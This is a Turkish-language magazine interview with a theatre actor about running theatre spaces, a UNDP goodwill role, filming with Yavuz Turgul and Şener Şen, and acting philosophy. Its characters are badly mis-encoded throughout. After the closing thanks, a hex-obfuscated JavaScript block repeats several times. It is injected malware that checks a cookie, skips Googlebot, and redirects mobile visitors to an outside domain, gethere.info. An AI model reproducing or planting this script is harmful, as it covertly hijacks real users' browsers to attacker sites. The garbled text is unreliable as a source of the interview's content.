Biliyorum ki birAi??ok kiAYiye ilham oldu ve cesaret verdi bu. Ai??nsanlar dedi ki, ai???ya biz de bir AYeyin A?zerine dA?AYA?nA?r, kurar, sorumluluk alAi??r, elimizi taAYAi??n altAi??na sokarsak; biz de topluluklarAi??mAi??zAi?? kurarAi??z, binalarAi??mAi??zAi?? aAi??arAi??z, hayatAi??mAi??zAi?? bu yaparAi??zai???. Bu bir yaAYam biAi??imine dAi??nA?AYmek demek. GerAi??ekten binalara ihtiyacAi??mAi??z yok, eAYer onlar kA?ltA?r merkezi olacaksa. Benim derdim bina iAYletmek deAYil. Bu binalarAi?? devlet aAi??Ai??p, iAYletmeyi bize versin, biz oluAYturduAYumuz topluluklarla bunu zaten yaparAi??z. Bizim derdimiz o deAYil. Binalar da tabii bizim kalelerimiz oluyor ama derdimiz mA?teahhitlik yapmak deAYil. Her ne kadar iki yAi??lda bir inAYaat yapan, mA?teahhitler gibi gAi??rA?nsek deai??i?? Okuldan mezun olurken epoksinin metrekaresinin ne kadar olduAYunu Ai??AYrenmek istemiyordum. Azu sAi??va tutar mAi?? diye bir derdim yoktu. Bu da iAYin parAi??asAi??ysa hiAi?? gocunmadan sonuna kadar devam ederiz.

ArtAi??k her giriAYimci tiyatrocunun bA?tAi??eyi, sermayeyi, yatAi??rAi??mlarAi??n ne zaman geri dAi??neceAYini bildiAYini sen de Ai??AYreniyorsun. EvliliAYe karAYAi?? iken birAi??ok kiAYi ve oluAYuma gAi??bekten baAYlanman ironik deAYil mi?
Onu diyorum ben de. Hem kredi iAYlerinden hem de sermayeden dem vurmayacaksAi??n. Hem bankadan kredi alAi??p tiyatro yapacaksAi??n sonra sermayeydi falan diyeceksin. Ya bAi??rak! O zaman niye kredi kartAi??yla satAi??AY yapAi??yorsun, AYu interneti niye kullanAi??yorsun? Hepsi birbiriyle baAYlantAi??lAi?? iAYte. Kendini neyle meAYrulaAYtAi??rdAi??AYAi??n Ai??nemli. Hep bAi??yle yaptAi??AYAi??nAi?? bir rasyonalize etmek, uzlaAYmak ama aslAi??nda korkunAi??laAYmak, ortak bir sinsilikte buluAYmakai??i?? Olacak iAY deAYil yani. O gerAi??ekliAYi kabul etmek lazAi??m.

Bir iAYin yapAi??lmasAi??nAi?? istiyorsan vakti olmayana ver demiAYler. BirleAYmiAY milletler (UNDP) iyi niyet elAi??isi olman peki? Ai??ok yakAi??AYtAi?? sana. Niye bu kadar seviliyorsun, aranAi??yorsun sence?
Evet, dedim ki yA?z yetmiAY iki milletle daha uAYraAYayAi??m. BirleAYmiAY Milletler ile bizim iki yAi??llAi??k bir Ai??alAi??AYmamAi??z zaten vardAi??. Yeni deAYil aslAi??nda. Bu iki yAi??lda altAi??, yedi Ai??alAi??AYmadan fazlasAi??na imza attAi??k birlikte. Bu sA?renin sonunda artAi??k bunun ismini koyalAi??m, duyuralAi??m dediler. Birlikte yapacaAYAi??mAi??z bir program vardAi?? zaten. DolayAi??sAi??yla 2017 bizim iAi??in bir merhaba yAi??lAi??. 2018 kararlarAi??mAi??zAi?? alAi??p uygulayacaAYAi??mAi??z yAi??l olacak. HA?lihazAi??rda kadAi??n giriAYimleri, Suriyeli kadAi??nlar, kAi??z Ai??ocuklarAi??nAi??n eAYitimi ve kadAi??n haklarAi??nAi?? kapsayan total bir Ai??alAi??AYma yaptAi??k. Azimdi o Ai??alAi??AYmanAi??n bir modelini Ai??stanbulai??i??da oluAYturacaAYAi??z. Ve sonunda tA?m TA?rkiyeai??i??ye yayacaAYAi??mAi??z bir AYeye dAi??nA?AYtA?receAYiz.

ai???KA?rk Mantolu Madonnaai???yAi?? izledin mi? Sabahattin Ali sevgin malum. Sen onun filmini yapmak istiyordun. Ah, oyununu da yapmak isterdim dedin mi? DiAYer sevdiAYin eserler; ai???Tutunamayanlarai??? ve ai???Anayurt Oteliai??? iAi??in Ai??alAi??AYmalarAi??n oluyor mu peki?
Oyunu izleyemedim ama zaten Tuba (A?nsal) ile de konuAYmuAYtuk projeyi. Ben bu yoAYunlukta baAYka bir yerde bir proje gerAi??ekleAYtiremezdim. Turneye gitmek baAYka bir AYey ama orada bir prodA?ksiyon iAi??inde yer almak benim iAi??in imkansAi??z. Ai??A?nkA? ortaklarAi??ma, buradaki personele karAYAi?? bir sorumluluAYum var. Biz de iki yAi??l A?zerine Ai??alAi??AYtAi??k, baya bir emek verdik. Ne olur, ne olmaz, onu zaman gAi??sterir. ai???Anayurt Oteliai??? ile hA?lA? Ai??ok sAi??caAYAi??m ama daha erken olabilir onun iAi??in de.

Azener Azenai??i??in de sana ne ifade ettiAYini biliyorum. AzofAi??rlA?kten Ai??AYretmenliAYe geAi??en hayat hikA?yesi gA?zel bir ilham. ai???BaAYka Dilde AAYkai???Ai?? yazarken bile, onun o muhalif tavrAi??ndaki baAYAi??rmayan hali sana dA?stur olmuAYtu. SanatAi??Ai??nAi??n muhalif olma durumunun bedene geAi??miAY hali, o hassasiyet sana AYiar olmuAYtu. Derken onunla aynAi?? filmde oynaman rA?ya gibi. Evren seni duyuyor. ai???Yol AyrAi??mAi??ai???nda nasAi??ldAi?? birlikte olmak?
Bu Yavuz Turgulai??i??un kararAi??dAi??r. Onun kararAi??na da hiAi??bir AYey kolay kolay etki edemez. GA?lengA?l ArlAi??el mA?thiAY bir yAi??netici. Yavuz hocayla ai???auditionai??? yapmadan zaten geAi??emiyorsun; Ai??yle bir AYey yok. Azener Azen hariAi?? herkesin denendiAYi bir sA?reAi?? ve bence inanAi??lmaz gA?zel bir AYey. Ai??alAi??AYma kA?ltA?rA?nA? yaygAi??nlaAYtAi??rmak, bAi??yle anlamakai??i?? Ne kattAi?? dersen, yA?zlerce andan oluAYan hatAi??ra defterinin yanAi?? sAi??ra neden sanat, neden tiyatro, neden sinema? Ben onu hatAi??rladAi??m. Sinemada her AYeyden sAi??yrAi??lAi??p o ana konsantre olmak. Tiyatroda zaten baAYka bir Ai??aren yok. Sahneye Ai??Ai??ktAi??AYAi??nda aklAi??n hiAi??bir AYeye kayamaz. O an, orada eAYlenmek ve eAYlendirmek durumundasAi??n. Bunun iAi??in hiAi??bir Ai??aba sarf etmemen gerekir A?stelik. Ai??aba sarf ediyorsan da problem vardAi??r. Ama kamera dediAYin AYeyin baAYka bir gerginliAYi, set dediAYin AYeyin baAYka bir durumu var. Yavuz hoca disiplinden hiAi?? Ai??dA?n vermeden, velhasAi??l onun iAi??inde, sana bir alan yaratarak, kendisinin Ai??nceden bildiAYi, oynattAi??AYAi?? karakterleri sana teslim ediyor ama bunu yaparken de sana deAYer veriyor, seninle ilgileniyor. Bunu bir AYey bahAYediyor gibi sAi??ylemiyorum. Kimsenin kimseyi dinlemediAYi, merhaba deyip arkasAi??nAi?? dAi??ndA?AYA?, nasAi??lsAi??n deyip, sorunun cevabAi??nAi?? beklemediAYi bu otomatik hAi??z kA?ltA?rA?nA?n iAi??inde Azener Azen ve Yavuz Turgul gibi iki gencin birilerinin zamanAi??nAi?? durdurabiliyor olmasAi??, zaman iAi??inde kendi zaman ve mekA?nlarAi??nAi?? yaratAi??yor olmalarAi??ai??i?? ai???Zemin Zaman Zuhurai??? vardAi??r Beliz GA?Ai??bilmezai??i??in kitabAi??. Tam da o. ZamanAi?? ve zemini yaratAi??yorlar ve zuhur oluyor. Hep bAi??yle eskilerin metodolojilerine ve terminolojilerine karAYAi?? gelirler yaai??i?? HA?lbuki o ilk akla gelen ve ilk verilen tepki. OnlarAi??n hepsi sana bir AYey anlatAi??yor. GeAi??miAYten gelen tecrA?belerin olmasAi??nAi??n yanAi?? sAi??ra Ai??ok da uygulanmAi??AY, seyirciyle temas etmiAY ve bunlarAi??n sonucunda yazAi??lmAi??AY AYeyler. Kimse AYimdi Stanislavski gibi oturup onlarca tiyatro provasAi??nAi??, oyuncuyla olan tecrA?besini, bir sA?zgeAi??ten geAi??irip buna da ai???Bir AktAi??r HazAi??rlanAi??yor – Bir Karakter Yaratmakai??? demiyor. Kimsenin Ai??yle bir vakti ya da Ai??yle bir kaygAi??sAi?? yok. DolayAi??sAi??yla yaAYadAi??AYAi??m bu tecrA?be benim iAi??in bir ai???workshopai??? gibi bambaAYka bir sA?reAi?? oldu. ai???KelebeAYin RA?yasAi??ai??? da Ai??yleydi benim iAi??in, ai???BaAYka Dilde AAYkai??? da Ai??yleydi. Ben Ai??ok ilham aldAi??m. Ai??nAYallah bir gA?n, yapacaAYAi??m bir iAYin iAi??inde Yavuz Turgul kadar farkAi??nda ve dA?hil eden o mesafedeki ai???maestroai???luAYa bir alanda ulaAYAi??rAi??m.

Meyerhold, Grotowski, Antonio Fava, comedie dellai??i??Arte ve biomekanik oyunculuktan haberdar bir oyuncu olarak, oyunculuk dA?sturun iAi??in ai???az Ai??okturai??? diyebilir miyiz? Becketai??i??in mi o sAi??z; ai???Ai??leri sAi??Ai??ramak iAi??in bazen iki adAi??m geri atman gerekirai??? ai???Yenil ama daha gA?zel yenilai???e de omuz veren?
Bu sAi??zler beni Ai??ok iyi anlatAi??r. Hepimiz sA?reAi??le Ai??ok ilgileniyoruz. Sanat dediAYin zaten dar sA?rece odaklAi?? bir AYey deAYildir. Ama sistem seni sA?rece de odaklanmaya iter. Ai??A?nkA? bilet satarsAi??n, Ai??A?nkA? seyircinin gelmesi gerekir. Ve yaptAi??AYAi??n iAY iAi??in, ne yazAi??k ki bir Ai??lAi??A?dA?r bu. Benim iAi??in bunlarAi??n dAi??AYAi??nda, kiAYinin kendi mA?cadelesi dAi??AYAi??nda buluAYtuklarAi?? bu ortak mA?cadele alanlarAi?? yaratmaktAi??r aslolan. GerAi??ekten bilfiil ortak kararlara imza atabilmek, ortak hataya da imza atabilmek bir AYeydir. Ortada bir kayAi??p varsa da o ortak kaybAi??n imzasAi??dAi??r. SonrasAi??nda da bunu sahiplenmek Ai??nemlidir. TA?m bunlarAi??n dAi??AYAi??nda kendine; yalnAi??z olmadAi??AYAi??na; dA?nyada birilerinin daha seninle aynAi?? fikirde olduAYuna inanmalAi??sAi??n. Ne kadar ai???uniqueai???, ne kadar farklAi??, ne kadar biricik, ne kadar baAYka da olsan, bir tarafAi??yla senden en az bir tane daha vardAi??r. Meslek de bAi??yle, sanat da bAi??yle, bizi yataktan kaldAi??ran AYey de bAi??yle. Ai??nsan kendini gA?ne baAYlatan AYeyin ne olduAYunu bulduAYunda zaten mutlu olur. Seni ne harekete geAi??iriyor? Seni inadAi??n harekete geAi??iriyorsa bir sorun yok. Seni hAi??rsAi??n, Ai??Ai??zemediAYin hesaplarAi??n harekete geAi??iriyorsa orada bir sorun var. DolayAi??sAi??yla herkes kendi tutkusunu, kendi hedefini bulduktan sonra da galiba Ai??mA?r boyu baAYAi??nAi?? Ai??evirmeden yA?rA?mekte, o yolunu bAi??rakmamakta bir sorun yaAYayacaAYAi??na inanmAi??yorum. BatarsAi??n, Ai??Ai??karsAi??n, kazanAi??rsAi??n, kaybedersin ama yA?rA?rsA?n. AAYk bAi??yle bir AYey.

Yine Ai??ok keyif aldAi??AYAi??m bir sAi??yleAYi oldu. Ai??ok teAYekkA?rler. var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 